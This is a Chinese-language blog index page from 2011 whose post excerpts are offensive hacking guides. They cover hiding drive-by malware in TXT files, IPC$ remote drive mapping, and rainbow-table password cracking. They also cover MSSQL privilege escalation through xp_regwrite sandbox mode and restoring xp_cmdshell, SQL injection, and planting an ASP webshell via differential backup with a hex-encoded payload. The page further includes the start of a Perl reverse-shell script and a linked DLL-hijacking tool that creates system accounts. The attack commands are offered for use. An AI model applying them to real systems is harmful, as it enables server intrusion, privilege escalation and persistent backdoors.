上一页 1 ··· 10 11 12 13 14 15 16 17 18 ··· 24 下一页

2011年4月27日

特殊的TXT挂马

摘要: 我们平常挂马无外乎就那么几种方式,如框架挂马、js挂马、css挂马.txt不是文本文件吗?它如何挂马?且听我慢慢道来,很简单的说.如果有人给你发个一个类似http://www.safeclub.tk/test.txt的链接,你敢不敢打开?如果你觉得这只是一个txt文件,打开就打开,没有什么好怕的,那是因为你还没听说过txt文件挂马,如果你听说过,那么你就不会这么大胆了.我们把以下代码保存为test.txtPS:为了显示,所以把width,height的值才设的那么大的.真正挂马的话最好设成0然后把test.txt上传到web空间中,访问一下.这可能要算浏览器的一个小BUG,在txt文件中只要加 阅读全文

posted @ 2011-04-27 02:59 小宝哥哥 阅读(206) 评论(0) 推荐(0) 编辑

dos命令全集---建议收藏

摘要: #1 一:net use \\ip\ipc$ " " /user:" " 建立IPC空链接 net use \\ip\ipc$ "密码" /user:"用户名" 建立IPC非空链接 net use h: \\ip\c$ "密码" /user:"用户名" 直接登陆后映射对方C:到本地为H: net use h: \\ip\c$ 登陆后映射对方C:到本地为H: net use \\ip\ipc$ /del 删除IPC链接 net use h: /del 删除映射对方到本地的为H: 阅读全文

posted @ 2011-04-27 02:57 小宝哥哥 阅读(180) 评论(0) 推荐(0) 编辑

2011黑帽安全大会的精彩点滴

摘要: 黒帽安全大会总是千奇百怪,来自世界各地的每一位安全爱好者都会想尽办法用其安全特技向世人展示网络安全世界的种种不足。下面,我简要为大家介绍2011黒帽安全大会的一些精彩点滴:1、32岁卢森堡大学博士研究员Ralf-Philipp Weinmann通过其笔记本电脑/假扮GSM基站,通过发送短信成功诱使iPhone用户访问其钓鱼网站。虽然没有按计划完整展示该攻击的全过程,但 Weinmann也同样对成功攻破iPhone 感到惊讶。这一发现无疑又增添了手机入侵的新方法。手机的无线通信是通过手机信号发射塔进行的,在Weinmann的研究中,他需要首先建立虚假信号发射塔,然后保证目标电话连接到该发射塔。只 阅读全文

posted @ 2011-04-27 02:52 小宝哥哥 阅读(132) 评论(0) 推荐(0) 编辑

用彩虹表破解MD5、LM Hash等复杂加密密码

摘要: 一、什么是彩虹表?彩虹表(Rainbow Tables)就是一个庞大的、针对各种可能的字母组合预先计算好的哈希值的集合,不一定是针对MD5算法的,各种算法的都有,有了它可以快速的破解各类密码。越是复杂的密码,需要的彩虹表就越大,现在主流的彩虹表都是100G以上。二、上哪找彩虹表去?现在有很多大牛已经把自己的彩虹表共享出来了,所以你可以去下载。还有一种方法就是自己通过工具生成。不过自己生成有点不切合实际,生成小的彩虹表吧数据少,可以破解密码的位数少(复杂程度低),而且费时费力,4核4GB内存的机器,生成2GB彩虹表,需要花费7天时间,而7天按1MB的带宽(160K/S左右)几乎可以下载30GB左 阅读全文

posted @ 2011-04-27 02:49 小宝哥哥 阅读(989) 评论(0) 推荐(0) 编辑

SA权限沙盒模式提权方法

摘要: sa下删除xp_cmdshell和xplog70.dll时候的一种办法,不算新的了,也被一些人不断的再次提出来,为了方便自己记忆再写出来,在这种情况下,要执行命令,条件是要有xp_regwrite。首先开启沙盘模式:exec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Jet\4.0\Engines','SandBoxMode','REG_DWORD',1然后利用jet.oledb执行系统命令select * from openrowset('m 阅读全文

posted @ 2011-04-27 02:44 小宝哥哥 阅读(490) 评论(0) 推荐(0) 编辑

SQL入侵恢复XP_CMDSHLL与开3389

摘要: 一,用SQL连接器恢复XP_CMDSHLLE的命令(1)sp_addextendedproc xp_cmdshell,@dllname='xplog70.dll'(2)首先在SqlExec Sunx Version的Format选项里填上%s,在CMD选项里输入sp_addextendedproc 'xp_cmdshell','xpsql70.dll'去除sp_dropextendedproc 'xp_cmdshell'(3)MSSQL2000sp_addextendedproc 'xp_cmdshell', 阅读全文

posted @ 2011-04-27 02:43 小宝哥哥 阅读(386) 评论(0) 推荐(0) 编辑

SQL注入的不常见方法

摘要: 大家在是否碰到过这样的站点:全站文章系统采用FSO静态生成的HTML文件来显示。这样做的好处一来可以减轻服务器负担,提高访问速度。二来也阻止了SQL注入式的攻击。。我来说说他们的文章系统原理:全部文章均在数据库存有一个副本。另处根据模板生成一个HTML页面。攻击方法:查看源文件/看里面是否有通过JS来调用的页面。如调用<script language="javascript" src="count.asp?id=1552"></script>来更新文章的浏览次数。我们就可以这样来试一下可否注入:http://服务器域名/count 阅读全文

posted @ 2011-04-27 02:31 小宝哥哥 阅读(151) 评论(0) 推荐(0) 编辑

MSsql差异备份总结

摘要: .完整备份一次(保存位置当然可以改)backup database 库名 to disk = 'c:\ddd.bak';--2.创建表并插曲入数据create table [dbo].[dtest] ([cmd] [image]);insert into dtest(cmd) values(0x3C25657865637574652872657175657374282261222929253E);--3.进行差异备份backup database 库名 to disk='目标位置\d.asp' WITH DIFFERENTIAL,FORMAT;--上面0x3C2 阅读全文

posted @ 2011-04-27 02:30 小宝哥哥 阅读(528) 评论(0) 推荐(0) 编辑

Linux下提权反弹脚本

摘要: linux下提权反弹脚本!代码如下#!/usr/bin/perl -w#use strict;use Socket;use IO::Handle;if($#ARGV+1 != 2){ print "$#ARGV $0 Remote_IP Remote_Port \n"; exit 1;}my $remote_ip = $ARGV[0];my $remote_port = $ARGV[1];my $proto = getprotobyname("tcp");my $pack_addr = sockaddr_in($remote_port, inet_ato 阅读全文

posted @ 2011-04-27 02:25 小宝哥哥 阅读(461) 评论(0) 推荐(0) 编辑

Ws2Help.dll提权工具

摘要: http://files.cnblogs.com/baogg/ws2help.dll.rar原理:劫持一个重要的系统函数,执行任意代码。使用方法:用于webshell提权,一般来说只要放到有网络行为的程序目录下就可以。最好是有自升级功能的,例如QQ、迅雷、BT、杀毒软件,输入法等,输入法目录一般权限较低,比较好利用。运行后会导致系统执行创建用户。(注意:应用系统版本需小于vista)需要创建的用户名和密码可以十六进制修改。一个程序的启动它会调用很多dll或者ocx组件,但是他是有一个顺序的。比如这个迅雷,他启动时会调用Ws2Help.dll这个组件,一般的情况,这个组件是我们的windows默 阅读全文

posted @ 2011-04-27 02:24 小宝哥哥 阅读(270) 评论(0) 推荐(0) 编辑

上一页 1 ··· 10 11 12 13 14 15 16 17 18 ··· 24 下一页

导航

Tasup